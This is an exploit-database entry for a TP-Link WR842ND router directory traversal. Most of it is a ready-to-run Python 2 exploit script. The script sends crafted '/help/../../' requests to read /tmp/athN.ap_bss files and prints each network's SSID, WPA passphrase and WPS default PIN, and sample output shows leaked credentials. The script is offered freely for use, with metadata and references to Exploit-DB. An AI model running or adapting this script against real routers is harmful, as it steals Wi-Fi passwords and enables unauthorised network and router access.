ID
VAR-E-201305-0258
EDB ID
25810
TITLE
TP-Link WR842ND - Remote Multiple SSID Directory Traversals - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
TP-Link WR842ND - Remote Multiple SSID Directory Traversals. CVE-94095 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | tp link | model: | wr842nd | scope: | - | version: | - | Trust: 1.0 |
EXPLOIT
#!/usr/bin/python
'''
TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit
Adam Simuntis :: http://unixjail.com
If remote management is on you have full access to router configuration - if not and you're connected
to router network you can discover another configured SSID's.
Successfully tested against TP-LINK WR842ND
Firmware Version: 3.12.22 Build 120424 Rel.39632n
Feel free to use, modify and distribute.
.-(~)---------------------------------------------------------------------------------(adam@ninja)-
`--> python2 e.py ip:port
TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit
Adam Simuntis :: http://unixjail.com
:: Crafting and sending evil request..
-> ssid="some_network"
!wps_default_pin=01010101
!wpa_passphrase="secretpsk"
:: Search for another networks? (y/n)
> y
:: Searching..
:: Jumping for SSID 1..
-> ssid="another_network"
!wps_default_pin=01010101
!wpa_passphrase="another_secretpsk"
:: Jumping for SSID 2..
:: Jumping for SSID 3..
:: Jumping for SSID 4..
.-(~)---------------------------------------------------------------------------------(adam@ninja)-
`-->
'''
import requests,sys,socket
from time import sleep
data=''
data2=''
url=''
W = '\033[0m'
R = '\033[31m'
B = '\033[34m'
#KISS
def parse_data(text):
words = text.split()
for word in words :
if 'ssid' in word and 'ignore' not in word :
print W+"-> "+B+"%s" %(word)
if 'pass' in word :
print W+" !"+R+"%s" %(word)
if 'default_pin' in word :
print W+" !"+R+"%s" %(word)
print W
def make_url(host,n):
junk = ("http://%s/help/../../../../../../../../../../../../../../../../tmp/ath%s.ap_bss") % (host,n)
return junk
if len(sys.argv) == 1 :
print "Usage: %s router_ip:port (default port=80)" %(sys.argv[0])
sys.exit()
url = make_url(sys.argv[1],0)
if ':' in sys.argv[1] :
host = sys.argv[1].split(":")
else :
host = sys.argv[1]
headers={
"Host" : host[0],
"User-Agent" : "Mozzila/5.0",
"Referer" : "http://"+host[0]+"/"
}
print "TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit"
print "Adam Simuntis :: http://unixjail.com\n"
try:
print R+":: Crafting and sending evil request.."
print W
data = requests.get(url,headers=headers).content
except requests.ConnectionError, e:
print R+":! Connection error!\n"
sys.exit()
if data :
parse_data(data)
else :
print B+":! Ups.. seems to be not vulnerable"
print W
print "\n:: Search for another networks? (y/n)"
answer = raw_input("> ")
if answer=="y" or answer=="Y" :
print R+"\n:: Searching.."
print W
for i in range(1,5) :
print W+":: Jumping for SSID %s..\n" %(i)
sleep(3)
url = make_url(sys.argv[1],i)
data2 = requests.get(url,headers=headers).content
if data2 :
parse_data(data2)
else :
print B+"-> Nothing..\n"
else :
print W+"\n:: Bye!"
print
Trust: 1.0
EXPLOIT LANGUAGE
py
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Remote Multiple SSID Directory Traversals
Trust: 1.0
CREDITS
Adam Simuntis
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 25810 | Trust: 1.6 |
| db: | EDBNET | id: | 47812 | Trust: 0.6 |
REFERENCES
| url: | https://www.exploit-db.com/exploits/25810/ | Trust: 0.6 |
SOURCES
| db: | EXPLOIT-DB | id: | 25810 |
| db: | EDBNET | id: | 47812 |
LAST UPDATE DATE
2022-07-27T09:18:55.927000+00:00
SOURCES RELEASE DATE
| db: | EXPLOIT-DB | id: | 25810 | date: | 2013-05-29T00:00:00 |
| db: | EDBNET | id: | 47812 | date: | 2013-05-29T00:00:00 |